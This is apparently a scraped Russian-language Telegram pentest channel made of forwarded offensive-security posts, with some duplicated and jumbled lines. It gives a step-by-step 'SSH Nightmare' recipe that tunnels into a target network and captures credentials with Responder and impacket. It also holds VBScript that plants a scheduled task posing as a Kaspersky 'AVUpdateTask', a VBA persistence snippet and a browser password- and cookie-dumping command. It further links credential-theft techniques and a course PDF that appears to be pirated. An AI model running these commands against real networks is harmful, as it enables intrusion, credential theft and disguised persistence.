Forwarded from -_-
ReadytoRun stomping прогугли
И в lnk завернёшь
И в lnk завернёшь
❤1
Forwarded from Zeebra
https://shorsec.io/blog/malrdp-implementing-rouge-rdp-manually/
Вот это неплохой вариант, чуть сложнее чем с lnk нагрузками
Вот это неплохой вариант, чуть сложнее чем с lnk нагрузками
❤1
Forwarded from Shmelev Jaroslav
В общем, вот рецепт для тех кто хочет SSH Nightmare:
Вводные - нужен доступ к Linux-хосту от root, PermitTunnel yes и два сетевых интерфейса на машине (можно и через один, но есть риск DoS при ошибках в конфигурации). В примере рассмотрим ситуацию когда есть внешний интерфейс eth0 и интерфейс в атакуемую сеть (eth1, 10.0.0.0/24).
1) Делаем туннель:
7) PROFIT!
Вводные - нужен доступ к Linux-хосту от root, PermitTunnel yes и два сетевых интерфейса на машине (можно и через один, но есть риск DoS при ошибках в конфигурации). В примере рассмотрим ситуацию когда есть внешний интерфейс eth0 и интерфейс в атакуемую сеть (eth1, 10.0.0.0/24).
1) Делаем туннель:
sudo ssh -i ~/.ssh/id_rsa -o Tunnel=ethernet -w 1:1 root@<linux>2) На локальной машине включаем интерфейс и выбираем свободный адрес в изолированной сети:
sudo ip link set tap1 up3) На удаленной машине делаем сетевой мост и назначаем ему адрес от интерфейса eth1:
sudo ip addr add 10.0.0.4/24 dev tap1
sudo brctl addbr bridgeforattackДля случая с 1 интерфейсом после смены IP обязательно нужно прописать дефолтный роут, например:
sudo brctl addif bridgeforattack tap1
sudo brctl addif bridgeforattack eth1
sudo ip addr del 10.0.0.2/24 dev eth1
sudo ip addr add 10.0.0.2/24 dev bridgeforattack
sudo ip link set dev tap1 up
sudo ip link set dev bridgeforattack up
sudo ip route add default via 10.0.2.14) Проверяем L2-доступ к сети с локальной машины:
ping -c1 10.0.0.15) Готовим атаку: спуфим респондером с отключенным SMB, а соединение принимаем на smbserver из impacket (респондер тоже их ловит, но часто дропает коннекты хз почему)
sudo responder -I tap16) ???
smbserver.py -smb2support share .
7) PROFIT!
Forwarded from Похек (Sergey Zybnev)
#подборка #awesome
John Hammond
STÖK
LiveOverflow
The XSS rat
Sathvik Techtuber
Guided Hacking
NetworkChuck
Grant Collins
Positive Events
OFFZONE MOSCOW
PwnFunction
DEFCONConference
David Bombal
HackTricks
PayloadsAllTheThings
Xakep
Poxek
PortSwigger
SecurityLab
Codeby
Awesome DevSecOps
iOS Security Awesome
Android Security Awesome
Personal Security Checklist
RedTeam Tools
OWASP Cheat Sheet Series
six2dez pentest-book
Awesome Bugbounty Writeups
Blog INTIGRITI
PentesterLand Writeups
Pentesting AD mindmap
Conference slides
TryHackMe
HackTheBox
VulnHub
GoAD
Exploit-DB
PortSwigger Academy
bWAPP
WebGoat
OWASP Juice Shop
FVWA
Root-Me
OverTheWire
Crackmes
Atomic Red Team
Codeby Games
Standoff КиберПолигон
HH
Хабр Карьера
BI.ZONE Bug Bounty
StandOff Bug Bounty
Yandex Bug Bounty
BUG BOUNTY RU
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Hack IT Easy
EXP-301-2022(OSED).pdf
8.6 MB
EXP-301-2022 💻❗️
Для всех, кто спрашивал про EXP-301 - пожалуйста)
Буду рад, если кто-то поделится мнением после изучения😊
P.S. Видео тоже есть, если будет много желающих - загружу
Для всех, кто спрашивал про EXP-301 - пожалуйста)
Буду рад, если кто-то поделится мнением после изучения😊
P.S. Видео тоже есть, если будет много желающих - загружу
Forwarded from Хакер — Xakep.RU
Магия SSPI. Достаем учетные данные Windows, не трогая LSASS #статьи #подписчикам
Windows позволяет разработчикам создавать шифрованные каналы связи, подписывать сообщения между клиентом и службой, аутентифицировать клиента на службе. Злоупотребляя этими возможностями, мы можем извлекать учетные данные пользователя без взаимодействия с LSASS. В этой статье я продемонстрирую, как это работает.
https://xakep.ru/2023/12/08/sspi-hack/
Windows позволяет разработчикам создавать шифрованные каналы связи, подписывать сообщения между клиентом и службой, аутентифицировать клиента на службе. Злоупотребляя этими возможностями, мы можем извлекать учетные данные пользователя без взаимодействия с LSASS. В этой статье я продемонстрирую, как это работает.
https://xakep.ru/2023/12/08/sspi-hack/
🔥1
5 способов, как взять домен с помощью PetitPotam / Хабр
https://habr.com/ru/companies/jetinfosystems/articles/690440/
https://habr.com/ru/companies/jetinfosystems/articles/690440/
Хабр
5 способов, как взять домен с помощью PetitPotam
В последнее время почти на каждом проекте по внутреннему пентесту я встречаю уязвимость PetitPotam. И почти всегда она помогает в получении привилегий администратора домена. При наличии доменной...
Forwarded from Миша
а что значит тихое?
но вообще вот код.
но вообще вот код.
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim td: Set td = service.NewTask(0)
td.RegistrationInfo.Author = "Kaspersky Corporation"
td.settings.StartWhenAvailable = True
td.settings.Hidden = False
Dim triggers: Set triggers = td.triggers
Dim trigger: Set trigger = triggers.Create(1)
Dim startTime: ts = DateAdd("s", 30, Now)
startTime = Year(ts) & "-" & Right(Month(ts), 2) & "-" & Right(Day(ts), 2) & "T" & Right(Hour(ts), 2) & ":" & Right(Minute(ts), 2) & ":" & Right(Second(ts), 2)
trigger.StartBoundary = startTime
trigger.ID = "TimeTriggerId"
Dim Action: Set Action = td.Actions.Create(0)
Action.Path = "C:\Windows\System32\cmd.exe"
Action.Arguments = "/c whoami"
Call service.GetFolder("\").RegisterTaskDefinition("AVUpdateTask", td, 6, , , 3)Forwarded from Миша
хм, а если вот так как-нибудь?
Sub CreateScheduledTask()
Dim shell As Object
Dim TaskName As String
Dim Command As String
Dim RunTime As String
TaskName = "MyCmdTask"
Command = "cmd.exe"
RunTime = "*/10 * * * *"
Set shell = CreateObject("WScript.Shell")
shell.Run "schtasks /Create /SC MINUTE /MO 10 /TN """ & TaskName & """ /TR " & Command, , True
Set shell = Nothing
End Sub
Forwarded from Offensive Xwitter
😈 [ LuemmelSec @theluemmel ]
One Box To Rule Them All
Little write up of my way to tackle remote pentesting situations with a dropbox.
This is about non covert systems that will allow you to carry out full fledged pentests when implanted into the customers network.
🔗 https://luemmelsec.github.io/One-Box-To-Rule-Them-All/
🐥 [ tweet ]
One Box To Rule Them All
Little write up of my way to tackle remote pentesting situations with a dropbox.
This is about non covert systems that will allow you to carry out full fledged pentests when implanted into the customers network.
🔗 https://luemmelsec.github.io/One-Box-To-Rule-Them-All/
🐥 [ tweet ]
Forwarded from Cybred
https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8
Таблица, отдельные скриншоты которой гуляют по разным чатам. Рекомендуемые коробки для подготовки к сдаче экзаменов от OffSec: PEN-200 (OSCP), PEN-300 (OSEP) и WEB-300 (OSWE).
И актуальная (последнее видео вышло 11 дней назад) серия видео с развертыванием и решением похожей локальной лаборатории: OSCP Practice Lab: Active Directory Attack Path #1, #2, #3.
Таблица, отдельные скриншоты которой гуляют по разным чатам. Рекомендуемые коробки для подготовки к сдаче экзаменов от OffSec: PEN-200 (OSCP), PEN-300 (OSEP) и WEB-300 (OSWE).
И актуальная (последнее видео вышло 11 дней назад) серия видео с развертыванием и решением похожей локальной лаборатории: OSCP Practice Lab: Active Directory Attack Path #1, #2, #3.
Google Docs
NetSecFocus Trophy Room
Powershell Tips & Tricks(RTC0024) | RedTeamRecipe
https://redteamrecipe.com/powershell-tips-tricks/
https://redteamrecipe.com/powershell-tips-tricks/
ExpiredDomains.com
redteamrecipe.com is for sale! Check it out on ExpiredDomains.com
Buy redteamrecipe.com for 195 on GoDaddy via ExpiredDomains.com. This premium expired .com domain is ideal for establishing a strong online identity.
Forwarded from Cybred
https://github.com/moonD4rk/HackBrowserData
HackBrowserData — это инструмент командной строки, который умеет расшифровывать и экспортировать данных из 18 браузеров на Windows, MacOS и Linux.
Извлекаемые данные:
— сохраненные пароли
— история браузера
— куки пользователя
— кредитные карты
— история скачиваний
— список расширений
— localStorage
— закладки
Пример использования:
На замену SharpChromium.
HackBrowserData — это инструмент командной строки, который умеет расшифровывать и экспортировать данных из 18 браузеров на Windows, MacOS и Linux.
Извлекаемые данные:
— сохраненные пароли
— история браузера
— куки пользователя
— кредитные карты
— история скачиваний
— список расширений
— localStorage
— закладки
Пример использования:
hack-browser-data.exe -b chrome -f json -dir results -cc
На замену SharpChromium.
GitHub
GitHub - moonD4rk/HackBrowserData: Extract and decrypt browser data, supporting multiple data types, runnable on various operating…
Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux). - moonD4rk/HackBrowserData
Pentester`s Notes pinned «https://habr.com/ru/companies/angarasecurity/articles/680138/»
Forwarded from hidden account
Forwarded from hidden account